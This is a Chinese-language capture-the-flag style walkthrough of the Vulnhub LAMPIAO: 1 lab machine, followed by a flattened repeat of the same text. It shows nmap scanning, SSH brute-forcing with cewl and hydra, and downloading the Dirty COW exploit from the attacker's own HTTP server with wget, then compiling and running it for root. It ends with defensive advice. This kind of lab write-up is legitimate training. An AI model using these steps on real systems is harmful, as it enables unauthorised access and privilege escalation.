Vulnhub LAMPIAO: 1 靶机渗透
字数 1424 2025-08-14 12:04:09

LAMPIAO: 1 靶机渗透教学文档

1. 靶机基本信息

2. 信息收集阶段

2.1 网络扫描

使用arp-scan识别靶机IP:

arp-scan -l

2.2 端口扫描

使用nmap进行端口扫描:

nmap -sV 192.168.43.143

扫描结果:

  • 22/tcp - SSH
  • 80/tcp - HTTP
  • 1898/tcp - HTTP

2.3 Web服务枚举

  1. 检查80端口和1898端口的HTTP服务
  2. 1898端口发现一个Drupal网站
  3. 目录扫描发现robots.txt文件

2.4 网站内容分析

  1. 检查robots.txt发现CHANGELOG.txt
    • 显示系统运行Drupal 7.x版本
  2. 发现可点击节点:
    • node/2node/3
  3. node/2包含:
    • 音频文件(.m4a): 包含提示"user:tiago"
    • PNG文件: 包含二维码(扫描后无有用信息)
  4. node/3包含:
    • 音频文件
    • 文字提示"Node 2 is not working"

3. 漏洞利用阶段

3.1 密码爆破

  1. 使用cewl生成密码字典:
    cewl http://192.168.43.143:1898 -w passwords.txt
    
  2. 使用hydra爆破SSH:
    hydra -l tiago -P passwords.txt ssh://192.168.43.143
    
    成功获取凭据: tiago:Virgulino

3.2 SSH登录

ssh tiago@192.168.43.143

3.3 提权准备

  1. 检查sudo权限:
    sudo -l
    
    无可用sudo权限
  2. 识别系统信息:
    • 2016年的Drupal 7系统
    • 可能受"Dirty COW"漏洞影响(CVE-2016-5195)

3.4 Dirty COW提权

  1. 搜索可用exploit:

    searchsploit dirty cow
    

    选择40847.cpp

  2. 在Kali上设置简易HTTP服务器:

    python2 -m SimpleHTTPServer 1234
    

    (注意: Python3需要使用不同命令)

  3. 在靶机上下载exploit:

    cd /tmp
    wget http://192.168.43.86:1234/40847.cpp
    
  4. 编译exploit:

    g++ -O2 -std=c++11 -pthread -o dirtycow 40847.cpp -lutil
    

    编译选项说明:

    • -O2: 优化级别2
    • -std=c++11: 使用C++11标准
    • -pthread: 多线程支持
    • -lutil: 链接util库
  5. 执行exploit:

    ./dirtycow
    

    获取root密码: dirtyCowFun

  6. 使用root登录:

    su root
    

    或直接使用SSH:

    ssh root@192.168.43.143
    

4. 获取flag

查找并查看flag文件:

find / -name flag.txt -type f 2>/dev/null
cat /path/to/flag.txt

5. 关键知识点总结

  1. 多端口HTTP服务检查: 不要只关注80端口
  2. 信息收集技巧:
    • robots.txt检查
    • 网站节点枚举(node/1, node/2等)
    • 多媒体文件分析(音频、图片)
  3. 密码爆破:
    • cewl生成字典
    • hydra进行爆破
  4. Dirty COW提权:
    • Linux内核漏洞(CVE-2016-5195)
    • 适用于较旧Linux系统
    • 需要C++编译环境
  5. 简易HTTP服务器:
    • Python2的SimpleHTTPServer
    • 用于文件传输

6. 防御建议

  1. 及时更新系统和内核
  2. 禁用不必要的用户账户
  3. 使用强密码策略
  4. 限制sudo权限
  5. 定期检查系统漏洞

7. 参考资源

  1. Dirty COW漏洞说明: https://dirtycow.ninja/
  2. Drupal安全公告: https://www.drupal.org/security
  3. Vulnhub靶机下载: https://www.vulnhub.com/
LAMPIAO: 1 靶机渗透教学文档 1. 靶机基本信息 靶机名称: LAMPIAO 下载链接: https://download.vulnhub.com/lampiao/Lampiao.zip 运行环境: Virtual Box (解压后导入.ovf文件) 测试环境: 攻击机(Kali Linux) IP: 192.168.43.86 靶机IP: 192.168.43.143 2. 信息收集阶段 2.1 网络扫描 使用 arp-scan 识别靶机IP: 2.2 端口扫描 使用 nmap 进行端口扫描: 扫描结果: 22/tcp - SSH 80/tcp - HTTP 1898/tcp - HTTP 2.3 Web服务枚举 检查80端口和1898端口的HTTP服务 1898端口发现一个Drupal网站 目录扫描发现 robots.txt 文件 2.4 网站内容分析 检查 robots.txt 发现 CHANGELOG.txt 显示系统运行Drupal 7.x版本 发现可点击节点: node/2 和 node/3 node/2 包含: 音频文件(.m4a): 包含提示"user:tiago" PNG文件: 包含二维码(扫描后无有用信息) node/3 包含: 音频文件 文字提示"Node 2 is not working" 3. 漏洞利用阶段 3.1 密码爆破 使用 cewl 生成密码字典: 使用 hydra 爆破SSH: 成功获取凭据: tiago:Virgulino 3.2 SSH登录 3.3 提权准备 检查sudo权限: 无可用sudo权限 识别系统信息: 2016年的Drupal 7系统 可能受"Dirty COW"漏洞影响(CVE-2016-5195) 3.4 Dirty COW提权 搜索可用exploit: 选择 40847.cpp 在Kali上设置简易HTTP服务器: (注意: Python3需要使用不同命令) 在靶机上下载exploit: 编译exploit: 编译选项说明: -O2 : 优化级别2 -std=c++11 : 使用C++11标准 -pthread : 多线程支持 -lutil : 链接util库 执行exploit: 获取root密码: dirtyCowFun 使用root登录: 或直接使用SSH: 4. 获取flag 查找并查看flag文件: 5. 关键知识点总结 多端口HTTP服务检查 : 不要只关注80端口 信息收集技巧 : robots.txt检查 网站节点枚举(node/1, node/2等) 多媒体文件分析(音频、图片) 密码爆破 : cewl生成字典 hydra进行爆破 Dirty COW提权 : Linux内核漏洞(CVE-2016-5195) 适用于较旧Linux系统 需要C++编译环境 简易HTTP服务器 : Python2的SimpleHTTPServer 用于文件传输 6. 防御建议 及时更新系统和内核 禁用不必要的用户账户 使用强密码策略 限制sudo权限 定期检查系统漏洞 7. 参考资源 Dirty COW漏洞说明: https://dirtycow.ninja/ Drupal安全公告: https://www.drupal.org/security Vulnhub靶机下载: https://www.vulnhub.com/